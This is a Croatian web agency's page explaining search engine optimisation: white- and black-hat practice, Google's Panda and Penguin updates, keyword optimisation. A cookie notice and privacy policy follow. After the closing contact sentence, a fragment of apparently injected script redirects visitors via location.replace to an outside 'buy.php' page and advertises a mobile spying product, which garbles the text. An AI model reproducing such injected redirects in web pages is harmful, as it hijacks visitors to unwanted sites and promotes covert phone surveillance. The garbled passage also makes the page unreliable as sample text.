Pošaljite upit!

SEO Search Engine Optimization

SEO Search Engine Optimization

Search Engine Optimization- SEO je postupak pripreme izrade web stranice koja je pravilnim indeksiranjem sadržaja “optimizirana” za tražilice. Kada smo optimizirali sadržaj za web, postoji niz pravila koja moramo pratiti i koje podržava Google, koji je bio dovoljno ljubazan da ih objavi i tako olakša svima koji žele to izvesti kako treba. Pravila se od milja nazivaju bijeli šešir SEO. Ako radite krivo, ili pravila koristite u svrhu manipulacije i/ili eksploatacije naziva se crni šešir SEO. Bijela i crna boja su bile boje šešira koje su se koristile u western filmovima za predstavljanje dobrih i loših momaka.

Pripremanje stranice za pravilno indeksiranje putem SEO je zapravo prvi korak za učinkovito promoviranje stranice. 2010 godine, SEO i SEM su bili svrstani kolektivno pod nazivom SEO, međutim od tog vremena te dvije discipline su postale samostalne po strategiji, tehnikama i metodama. SEO je pasivan ali bitan u procesu marketinga. Jako je bitno da je web stranica optimizirana, ali ne previše optimizirana, jer to može negativno djelovati na vašu stranicu.

 

Povremeno Google napravi promjene u pravilima koje sajt menadžeri (webmasteri i osobe zadužene za marketing) slijede. Manje promjene često ostanu neimenovane, međutim velike promjene se imenuju tako da privuću pažnju, i da se kategorički adresiraju promjene tako da web profesionalci znaju na koju vrstu marketinga utječe promjena. Neki od Google naziva za promjene su Caffeine, Panda ili Penguin. Slatko kako zvuče, svaki od njih ima skup svojih kriterija i pravila. Na primjer Penguin 2.0 promjene će utjecati na previše optimiziranu stranicu, na način da će utjecati na položaj stranice na ljestvici.

 

Optimizacija generalno podrazumijeva prilagođavanje teksta i svojstva web stranice da se uključi pozicija teksta, izbor ključnih riječi, struktura stranice, naslovna stranica, gustoća ključnih riječi te mnoge druge karakteristike. Bez obzira na sve, Google daje prilično jasne smjernice o tome što je prihvatljivo ili ne.

 

Ako Vas zanima još nešto vezano za SEO optimizaciju, slobodno nas kontaktirajte i rado ćemo pomoći.”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);} www.trymobilespy.com

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori